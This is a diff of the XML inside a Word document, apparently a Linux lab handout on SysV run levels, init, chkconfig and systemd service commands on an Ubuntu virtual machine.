+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>service ssh status</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>to check that the previous command worked as you think it should.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>When you are done, make sure the sshd service is stopped.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">If you run </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ls /etc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ls /etc/rc*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>to see just directories that start with rc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the rc </w:t>
+      </w:r>
+      <w:r>
+        <w:t>directories</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that provide SysV compatibility.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>The standard run level that</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> provides GUI support</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is 5,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> so let’s look at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>rc5.d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ls -l /etc/rc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>.d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9CCE06" wp14:editId="6052A0C8">
-            <wp:extent cx="4849978" cy="822838"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655C60ED" wp14:editId="69A7EC1F">
+            <wp:extent cx="4742597" cy="724653"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="6" name="Picture 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1539,7 +611,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -1551,7 +623,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4978676" cy="844673"/>
+                      <a:ext cx="4844396" cy="740208"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1563,45 +635,57 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Log in and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">use sudo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to get back to the desktop.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:r>
+        <w:br/>
+        <w:t>&lt;snip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The symbolic links</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (symlinks)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in /etc/rc</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.d point to files in the /etc/init and /etc/init</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d directories.  Look at the contents of those directories as well.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /etc/init.d </w:t>
+      </w:r>
+      <w:r>
+        <w:t>directory</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, you will see it contains a shell script.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  Remember, in SysV the init program looks at the files in the proper run level directory and then executes the files the symlinks point to.  It uses symlinks to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FF839" wp14:editId="645F8F20">
-            <wp:extent cx="4879238" cy="2018420"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
-            <wp:docPr id="7" name="Picture 7"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E03D7A6" wp14:editId="47832150">
+            <wp:extent cx="4261110" cy="2348837"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="5" name="Picture 5"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1621,6 +705,497 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="4290149" cy="2364844"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>&lt;snip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no init directory, since init is the name of the command used to change </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5) </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/etc/rc.d/rc5.d</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.  There is a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /etc/rc5.d, but it is just a symlink that points to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/etc/rc.d/rc5.d.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To ease the burden of keeping track of the symlinks in the rc.d directories</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">SysV uses a utility </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">called </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  In addition to maintaining the rc.d directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>, chkconfig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> will also list the services on the VM (not supported in Ubuntu on systemd, though).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The SysV command to show the current </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>runlevel</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  It is supported by systemd, so go ahead and execute it.  It will show you the equivalent RedHat </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for the GUI level.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The SysV command to change </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>telinit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is supported in systemd</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (note: it works in VMware Player 16.1.2 with Ubuntu </w:t>
+      </w:r>
+      <w:r>
+        <w:t>20.04 but</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> locks up in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VMware Player 15.1 and Ubuntu 18.04</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  The command to change to the Ubuntu console </w:t>
+      </w:r>
+      <w:r>
+        <w:t>run level</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> would be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(emergency)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init 2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (console only).  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">udo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> would take you back to the GUI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or the old run level 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">init </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  Your VM will </w:t>
+      </w:r>
+      <w:r>
+        <w:t>drop</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> into a terminal-only mode.  What you will see is terminal with no GUI, like the sysadmins had in days of old.  Notice that there is no scroll bar, so something that goes off the top of the screen is gone forever.  There is no mouse</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pointer for cutting and pasting</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  Omg, how did they manage?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CA9A80" wp14:editId="498E14FC">
+            <wp:extent cx="4747565" cy="1357317"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4789643" cy="1369347"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>cntl-alt</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9CCE06" wp14:editId="6052A0C8">
+            <wp:extent cx="4849978" cy="822838"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="4" name="Picture 4" descr="Shape, rectangle&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4978676" cy="844673"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Log in and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>use sudo init 5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to get back to the desktop.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FF839" wp14:editId="645F8F20">
+            <wp:extent cx="4879238" cy="2018420"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4902875" cy="2028198"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -1636,15 +1211,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>The VM steals your mouse because VMware Tools (open-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tools, really) are not running in console mode.</w:t>
+        <w:t>The VM steals your mouse because VMware Tools (open-vm tools, really) are not running in console mode.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1659,21 +1226,12 @@
       <w:r>
         <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --list</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>chkconfig --list</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> from SysV is</w:t>
@@ -1701,6 +1259,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Note that if you use </w:t>
       </w:r>
       <w:r>
@@ -1773,7 +1332,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
@@ -1900,7 +1458,10 @@
         <w:t>ssh</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> service using </w:t>
+        <w:t xml:space="preserve"> service using</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1930,7 +1491,13 @@
         <w:t>systemctl start ssh</w:t>
       </w:r>
       <w:r>
-        <w:t>, and</w:t>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>and</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2154,43 +1721,43 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>[john@john ~]$ systemctl list-units --type target</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>john@john</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>UNIT                   LOAD   ACTIVE SUB    DESCRIPTION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>~]$</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> systemctl list-units --type target</w:t>
+        <w:t>basic.target           loaded active active Basic System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2208,7 +1775,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>UNIT                   LOAD   ACTIVE SUB    DESCRIPTION</w:t>
+        <w:t>cryptsetup.target      loaded active active Encrypted Volumes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2220,91 +1787,83 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>basic.target</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>getty.target           loaded active active Login Prompts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">           loaded active </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
